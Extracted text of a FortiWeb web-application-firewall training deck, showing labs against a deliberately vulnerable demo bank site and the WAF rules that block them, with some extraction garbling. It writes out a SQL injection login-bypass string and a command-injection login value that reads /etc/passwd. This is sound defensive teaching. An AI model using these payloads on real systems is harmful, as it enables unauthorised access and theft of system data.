URL Rewriting > Creating Rewriting Rules (2)


146/362

1. Unique Rule Name

2. What to rewrite

3. Where to rewrite

4. Click OK to save

5. Click Create New to define RegEx

URL Rewriting > Define Regular Expression Match


147/362

1. Select which object to match

2. Define the Pattern Match

3. Select conditionof the match

A Note on Regular Expressions


148/362

Matching URL Paths to a regex provides a concise

and flexible means for matching strings of text.

Meta-character

Description

Matches any single character

[ ] Matches a single character contained within the brackets

^ Matches the starting position within the string

$ Matches the ending position within the string

* Matches the preceding element zero or more times

? Matches the preceding element zero one time

| Choice operator matches either the expression before or the expressionafter the operator

( ) Memory. Expressions between parentheses remains in a memory position

URL Rewriting > Creating Rewriting Rules (3)


149/362

Specify the new URL path to be used

to connect to the defined physical server

NOTE: $0 = the first RegEx parameter matched

(everything inside the first set of parenthesis)

URL Rewriting > Create a new Rewrite Policy


150/362

2. Click Create New

1. Create a new URLRewriting Policy

URL Rewriting > Create a new Rewrite Policy (2)


151/362

3. Unique Policy Name4. Click OK to Save

5. Click Create New to select andprioritize Rewrite Rule(s)

URL Rewriting > Set Rewrite Rule Priority


152/362

1. Set Rule Priority

2. Select Rewrite Rule

3. Click OK to Save

NOTES: (Least Cost Priority exec first) Priorities determine the execution order ofthe rewriting rules

Lower priority values are executed beforehigher priority values

URL Rewriting > Set Rewrite Rule Priority


153/362

Final Results

URL Rewriting > Associate Rewrite Policy to Protection Profile


154/362

2. Edit Protection Profile

3. Select rewrite policy

& Click OK to save

1. Navigate to

Web Protection Profile

URL Rewriting > Associate Protection Profile to Server Policy


155/362

3. Select WebProtection Profile

1. Navigate to

Server Policy

2. Edit Server Policy

URL Rewriting Test Configuration


156/362

After creating the URL Rewriting Policy, assigning it to the Web

Protection Profile xbank_web_protection and applying the WebProtection Profile to the Server Policy xbank_web_policy

Test the rewrite by entering www.xbank.com into your browser

Preventing Information Disclosure
http://www.xbank.com/http://www.xbank.com/


157/362

Preventing Information Disclosure

Discussion and Lab

Information Disclosure


158/362

1. Usually one of the first steps taken from malicious

users that will attack a system is gatheringinformation about it: Operating System, versions,application types, etc.

2. This gathering process is known as fingerprinting3. The Server Protection rule Information Disclosure

helps prevent the disclosure of this type ofinformation.

Prevent Information Disclosure


159/362

1. Point your browser to http://www.xbank.com/xxx.html

2. What did you get as response?. Any problem with it?

3. Sometimes applications give to much informationwhen showing an error.

Prevent Information Disclosure - Configuration
http://www.xbank.com/xxx.htmlhttp://www.xbank.com/xxx.html


160/362

1. Navigate toServer Protection

2. Create a New Policy

Prevent Information Disclosure Configuration (2)


161/362

1. Name the Server Protection Policy: Server_Protection-xbank

2. Enable only the Information Disclosure rule

3. Select the Action of Alert & Erase4. Click OK to save

Prevent Information Disclosure Configuration (3)

Edit th b k b t ti d i th l t d l


162/362

Test by accessing http://www.xbank.com/xxx.html

Edit thexbank_web_potection and assign the newly created rule

1. Select New Policy

Prevent Information Disclosure Check Attack Log


163/362

Cross Site Scripting (XSS)


164/362

Preventing Cross Site Scripting (XSS)Discussion and Lab

Cross Site Scripting (XSS)


165/362

This is a type of attack on which malicious scripts are

injected into trusted sites. Most of the time the reason a site is vulnerable to this

type of attack is because they dont do appropriate

parameter validation Can be used to steal credentials, user and cookies

information

It exploits the fact that the user trusts the site


166/362

Cross Site Scripting (XSS) An example (index.php)

Index.php is a frameset that contains three frames:


167/362

- Top: topFrame.html

- Bottom: bottomFrame.html- Main: Gets the content from the p parameter value.

- By default: parameter p is feed content from login.html

Cross Site Scripting (XSS) An example (index.php)

Look what happens if you change the This is just a simple


168/362

You dont need toguess what happens

when a malicious siteis used instead ofwww.google.com?

Look what happens if you change the

value of parameter p to another value?

This is just a simple

example of XSS!

Prevent XSS Parameter Validation > Create Rule
http://www.google.com/http://www.google.com/


169/362

1. Navigate to

Parameter Validation Rule

2. Click Create New

Prevent XSS Parameter Validation > Create Rule (2)

1 Name the Rule:


170/362

1. Name the Rule:index.php

2. Select Host Status

3. Select Host Name

4. Define the Request URL

5. Select the Action:Alert & Deny

6. Select the Severity:High

7. Click OK to save8. Click Create New to

define rule match criteria

Prevent XSS Parameter Validation > Create Rule (3)


171/362

1. Parameter Name: p2. Max Length set to

default value of 0

3. Select Required

4. Select Use Type Check5. Select Argument Type

= Regular Expression

6. Regular Expression =

^login.html$7. Click OK to save

Rule match: parameter p = login.html

Prevent XSS Parameter Validation > Create Policy


172/362

1. Navigate to

Parameter Validation Policy

2. Click Create New


173/362

Prevent XSS Parameter Validation > Apply Policy


174/362

1. Apply the Parameter Validation Policy Parameter_Validation_Policy1to the Inline Protection Profile xbank_web_protection

2. Click OK to save


175/362

Prevent XSS Parameter Validation > Check Attack Log

Navigate to Log & Report > Log Access > Attack and search for the XSS


176/362

Navigate to Log & Report > Log Access > Attack and search for the XSS

Attack you just completed

Prevent SQL Injection


177/362

Prevent SQL Injection

Discussion

SQL (Structured Query Language) Language for

SQL Injection An overview of SQL


178/362

SQL (Structured Query Language). Language for

managing data in DBMS (Database ManagementSystems) Commands are grouped in four sets:

1. Data Manipulation Language (DML): SELECT, UPDATE, INSERT,DELETE

2. Data Definition Language (DDL): CREATE, ALTER, DROP3. Data Control Language (DCL): GRANT, REVOKE

4. Transaction Control Language (TCL): COMMIT, ROLLBACK

SQL Injection attackis about modifying SQL sentences by

inserting special strings in application fields, URLs, hiddenfields, etc.


179/362

SQL Injection An overview of SQL DML (2)

Inserting a record in a database (basic):


180/362

XBANK_CUSTOMER

customer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_addresscustomer_since

INSERT INTO xbank_customer (

customer_login,

customer_password,

customer_fname,

customer_lname)

VALUES (

mylogin,

abc1234,John,

Anderson)

Inserting a record in a database (basic):

INSERT INTO Table1 (

Field1,

Field2,

)

VALUES (

Value1,

Value2,

)


Updating a record in a database (basic):


181/362

UPDATE Table1 SET

Field1 = Value1,

Field2 = Value2,

WHERE

Condition1 [and|or]

Condition2

XBANK_CUSTOMERcustomer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_addresscustomer_since

UPDATE xbank_customer SET

customer_login = mylogin,

customer_password = abc1234,

customer_fname = John,

customer_lname = AndersonWHERE

customer_id = 1

Updating a record in a database (basic):


Deleting a record from the database (basic):


182/362

DELETE FROM Table1

WHERE

Condition1 [and|or]

Condition2

XBANK_CUSTOMERcustomer_idcustomer_logincustomer_passwordcustomer_fnamecustomer_lnamecustomer_emailcustomer_address

customer_since

DELETE FROM xbank_customer

WHERE

customer_email LIKE %@company.com or

customer_login = mylogin

Deleting a record from the database (basic):


183/362


184/362

Try to login to the application without using any valid user

SQL Injection - CHALLENGE: Login to the application


185/362

Try to login to the application without using any valid user

or password.TIP: Youll have to inject some SQL

By injecting some SQL you can change the conditional part of the

SQL Injection - CHALLENGE: Login to the application (2)


186/362

y j g y g pquery so its always true Login: whatever you want Password: mypassword' or 'a'='a

Take a look at the query executed by the application:select

customer_id

fromxbank_customer

wherecustomer_login = whatever you want and

customer_password = mypassword or a=a ;

The part that is after the oris always true: a is always equal to a


187/362

Prevent SQL Injection Server Protection > Test Policy

1 Navigate to http://www xbank com/index php?p=login html and attempt a
http://www.xbank.com/index.php?p=login.htmlhttp://www.xbank.com/index.php?p=login.html


188/362

1. Navigate to http://www.xbank.com/index.php?p=login.html and attempt a

new SQL injection: Login with password = mypassword' or 'a'='a2. Check to see if your login attempt gets blocked

Prevent SQL Injection Server Protection > Review Log

Navigate to Log & Report > Log Access > Attack and search for the SQL
http://www.xbank.com/index.php?p=login.htmlhttp://www.xbank.com/index.php?p=login.html


189/362

Injection Attack you just completed

1. Instead of using Server Protection signatures, you could

Prevent SQL Injection Summary


190/362

stead o us g Se e otect o s g atu es, you cou d

also use parameter validation to prevent SQL Injectionlike we did in the Cross Site Scripting lab

2. To accomplish this Edit Server Protection Rule anddisable the SQL Injection signatures

3. Go to Parameter Validation

Input Rule and create anew one: Request URL: /verify_admin.php

Verify parameters txtUserand txtPassword. Enforce a maximum of 8 (eight)alphanumeric characters (use regex [A-Za-z0-9])

4. Assign the new Input Rule to the already appliedParameter Validation Rule


191/362


192/362

Command Injection A look to verify_admin.php


193/362

exec( ) function executes an operating system command.

In this case exec( ) is generating a log entries for successfuland failed logins and is using the variable $log

1. Disable Parameter Validation rules in

Command Injection Executing commands


194/362

xbank_web_protection

2. Since the login field value is being used by the exec( )command without validating it first, it is possible to injectsome commands there Login: myuser; cat /etc/passwd > salida.txt ; echo Password: whatever

3. Take a look at the command executed by the application:exec(echo 2011-05-21 15:20:10: User myuser; cat/etc/passwd > salida.txt ; echo logged in failed >>log/logins.txt

4. You just copied the content of/etc/passwdto a file in sitesroot directory, salida.txt

5. Go to the HTTP Server (Linux) an see if the file

Command Injection Executing commands (2)


195/362

5. Go to the HTTP Server (Linux) an see if the file

/var/www/xbank/salida.txt


196/362

Preventing Cross Site Resource Forgery (CSRF)


197/362

Preventing Cross Site Resource Forgery (CSRF)

Discussion


198/362


199/362


200/362

CSRF Attacking www.xbank.com > run attack

Search for the file csrf page.html in the resource


201/362

Search for the file csrf_page.htmlin the resource

provided and double-click it


202/362

CSRF Attacking www.xbank.com (2)

7. let's take a look to csrf page.html


203/362

_p g

Prevent CSRF Applying business logic

On way of preventing CSRF is enforcing the session


204/362

y p g g

to follow the application logic.

For instance; to perform a withdrawal in

www.xbank.com you should first go through

1. verify_admin.php

2. do_transaction.php

3. save_transaction.php

Page Access Rule functionality enforces businesslogic by means of a cookie, FORTIWAFSID


205/362

Prevent CSRF Applying business logic (3)

1. Name Policy: page_access1


206/362

2. Click OK to save3. Click Create New to

create a new rule

4. Enable Host Status5. Select Host from

dropdown

6. Specify Match Type: RegEx

7. Add URL Pattern8. Click OK to Save

9. Repeat for Additional URLS



207/362

Final Results of CSRF Rules Page


1. Editxbank web protection


208/362

_ _p

2. Enable Session Management

3. Select the recently created page access rule

NOTE: In order to enforce business logic, the FortiWeb

must be session aware. Thats why is mandatory to

enable session management.


209/362

1. Log back into www.xbank.com

Prevent CSRF Testing Configuration > Check Balance


210/362

2. Stay at the account listing page and review balance

Log back into www.xbank.com

Prevent CSRF Testing Configuration > Rerun attack


211/362

Stay at the account listing page and review balance Open your browser cookie viewer and search for the

cookie FORTIWAFSID

Double click csrf_page.html

Review your balance

Prevent CSRF Testing Configuration > Verify No change


212/362

Any change?

Prevent CSRF Testing Configuration > Check Attack Logs


213/362

Brute Force Attacks


214/362

Brute Force AttacksDiscussion


215/362


216/362

What is Enable Share IP

Some source IP addresses represent 1 single computer, but other


217/362

source IP addresses represent 100 or 1000 computers. Caused by Source Hide NAT

Some FWB policies provide access rate limits A rate limit applied to 1 computer should be smaller than a rate limit applied to

500 computers

Thus 2 configuration values

How does FWB determine that a multiple connections originate frommore than 1 computer? Instead of only counting hits by source IP,

It counts hits by source IP + ID Field in the IP header (non-contiguous numbers)


218/362

Configuring Brute Force Login Rule > Enable Share IP


219/362

1. Navigate toShare IP

2. Select Enable Share IP

3. Click Apply to save

Configuring Brute Force Login Rule > Enable Policy


220/362

1. Edit Inline Protection Profilexbank_web_protection

2. Select Brute Force Login

Configuring Brute Force Login Rule (3)

Apply the Brute Force Login rule to


221/362

xbank_web_protection Access http://www.xbank.com/login.html

Refresh your browser as fast as you can until you getbanned for 10 seconds (F5, Command + R, etc.)

Configuring Brute Force Login Rule > Review Attack Log
http://www.xbank.com/login.htmlhttp://www.xbank.com/login.html


222/362

Auto-Learning


223/362

FortiWeb Learning Mode

Any WAF deployment requires

FortiWeb Deployment Auto-Learning


224/362

some knowledge of theapplication

This adds complexity to the

deployment

Auto-Learning is a mode that canhelp during the deployment

phase to create a baseline basedon the behavior

1. Go to Auto Learn Auto Learn Profile Default Auto

Configuring Auto-Learning


225/362

Learn Profile and create a new Inline Profile namedxbank-auto

1. Go to Server Policy Policy, editxbank_web_policyand assign

Web Protection Profile: Inline Alert Only

WAF Auto Learn Profile: xbank-autoXXXXXX


226/362

Configuring Auto-Learning > Create a new Profile (2)


227/362

2. Specify Profile Settings

1. Name Profile

3. Click OK to save

Configuring Auto-Learning > Check Session Management


228/362

1. Go to InlineProtection Profile

2. Edit xbank_web_protection

3. Make sure Session Management is Enabled

Configuring Auto-Learning > Apply new Auto Learn Profile


229/362

1. Go to Server Policy

2. Edit Xbank_web_policy

3. Select Auto Learn Profile

3. Enable Monitoring Mode

1. Access the XBANK site and navigate on it. Try to access

Configuring Auto-Learning > Test WAF Auto Learn Profile


230/362

every page, make transfers, update profile, etc.2. Go to Auto Learn Auto Learn Report in the FortiWeb

3. Review the report automatically generated by auto-learnfeature

4. Download the Report as PDF and review it

5. Note that is possible to edit and adjust some of theresults

6. Generate Configuration based in the Auto-Learn report

Configuring Auto-Learning > Auto Learn Report


231/362

1. GenerateConfig

2. Name Profile

2. Click OK to save

Pay special attention to the Parameters Validation rules

Configuring Auto-Learning > Review generated configuration


232/362

Anti-Defacement

Web Defacement


233/362

Tool

A website defacement is an attack on a website that

Web Defacement


234/362

changes the visual appearance of the site or awebpage

FortiWeb has a Anti-Defacement tool that recognizes

FortiWeb Anti-Defacement Tool


235/362

when a web site file has been changed and reactsaccordingly

1. Backup and creates a hash for each sites objects

2. Monitor each object comparing their hash with theones registered

3. If any change:

Alert and manually recover changed file Automatically recover changed file

Configure Anti-Defacement Tool


236/362

1. Go to Web Anti-Defacement

2. Create New

Configure Anti-Defacement Tool > Create Policy


237/362

Go to Web Site withAnti-Defacement

& Create New Policy

Name Policy

Set Monitor Intervals

Enable Auto Restore

Click OK to save Test Connection

o Enable Monitoring

o Define folder to monitor

o Specify credentials usedfor monitoring


238/362

Configure Anti-Defacement Tool > Review (2)

Inspect the policy details and statistics


239/362


Inspect the list protect files and attributes


240/362

1. Edit the login.htmlfile and change something in its content



241/362

2. Wait until you see that one file has detected as changed

3. Inspect changes by clicking on the Total Changed filesnumber

4. Access the XBANK site and you will see the defaced site

Review log file and verify the defacement event

Configure Anti-Defacement Tool (8)


242/362


243/362

FortiWeb BasicTroubleshooting

Get System Status

# get system status


244/362

Get System Performance

# get system performance


245/362

Get System Global

# get system global


246/362

System Top

# diag system top Proceso, id del Proceso, estado, C d


247/362

Consumo de cpu Consumo de memoria

Si presionas q te ordena Consumo de procesador o memoria

# diag system kill

Diag system kill (id del proceso)

System Flash List

# diag system flash list Muestra las diversas particiones y las versiones corriendo en las mismas. SE muestran cuando se

t li l i j l i t li bi d i t i l


248/362

actualiza el equipo por ejemplo si no se actualiza bien se puede regresar a una version anterior con lacopia qeu el equipo gardo a una version posterior.

Execute Options

# execute ?


249/362

El traceroute al modificar el ping-options tambien se hace respecto al source del ping.

Cuando se da de alta un fortigate o fortiweb: para evitar el tiempo de espera de registro en fortiguard utilizar:

Exec-update-av

exec update-ips

Exec update-now

El reseteo del disco de logs pide reinicio.

Execute Ping

# execute ping


250/362

Execute Traceroute

# execute traceroute


251/362


252/362

FortiWeb AdvancedTroubleshooting

Diagnose Commands

CLI command trees: diagnose, get


253/362

Commonly used sub-branches

Numerous options/parameters viewed with ?

diag network sniffer

diag system

diag debug

diag application

get log

get sys

Diagnose Debug Flow

# diagnose debug flow filter cleardiagnose debug flow policy client-ip di d b fl li di ti {b th | li t t | t
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.html


254/362

diagnose debug flow policy direction {both | client-to-server | server-to-client}diagnose debug flow policy server-ip

diagnose debug flow filter server-ip 2.2.128 (ip-fisica/real)diagnose debug flow show module-process-detail ondiagnose debug flow trace startdiagnose debug enable

Diagnose Debug Flow

We must see:
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.htmlhttp://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_flow_filter.html


255/362

Crash Log

# diagnose debug crashlog read


256/362

Use this command to show crash logs from application proxies thathave call back traces, segmentation faults, or memory register dumps,

or to delete the crash log.

Diagnose Debug Application

# diagnose debug application autolearn [{-1 | 0}]
http://docs.fortinet.com/fweb/html/cli-olh/FortiWeb%20Online%20CLI%20Reference/debug_application_autolearn.htmlhttp://docs.fortinet.com/f

latam mx fortiweb fortidb training-v1.1

Documents